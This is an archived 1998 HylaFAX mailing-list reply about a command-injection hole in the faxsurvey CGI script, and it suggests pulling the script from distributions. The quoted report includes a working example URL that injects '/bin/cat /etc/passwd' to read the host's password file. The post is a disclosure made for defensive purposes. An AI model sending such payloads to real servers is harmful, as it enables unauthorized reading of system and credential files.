Re: Security-Hole in faxsurvey-form

To: Carsten Hoeger <choeger@suse.de>
Subject: Re: flexfax: Security-Hole in faxsurvey-form
From: Matthias Apitz <Matthias.Apitz@Sisis.de>
Cc: flexfax@sgi.com
Date: Wed, 29 Jul 1998 17:01:13 +0200

On Wed, Jul 29, 1998 at 03:20:05PM +0200, Carsten Hoeger wrote:
> Hello all,
> 
> 
> JFYI:
> 
> 
> in the faxsurvey-cgi that comes with HylaFAX is a security-hole.
> 
> If you try this:
> 
> http://www.anyhost-with-this-cgi.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
> 
> 
> You can e.g. read the host's passwd...
> 
> 
> If this survey is from interest, I'll make a bug-fix.

Until a better solution for collecting the faxsurvey we should
remove this from the distributiuons;

	matthias

Prev by Date: Re: (no subject)
Next by Date: Re: Security-Hole in faxsurvey-form
Prev by thread: Security-Hole in faxsurvey-form
Next by thread: Re: Security-Hole in faxsurvey-form
Index(es):
- Main
- Thread

Report any problems to webmaster@hylafax.org

HylaFAX is a trademark of Silicon Graphics Corporation.
Internet connectivity for hylafax.org is provided by:
VirtuALL Private Host Services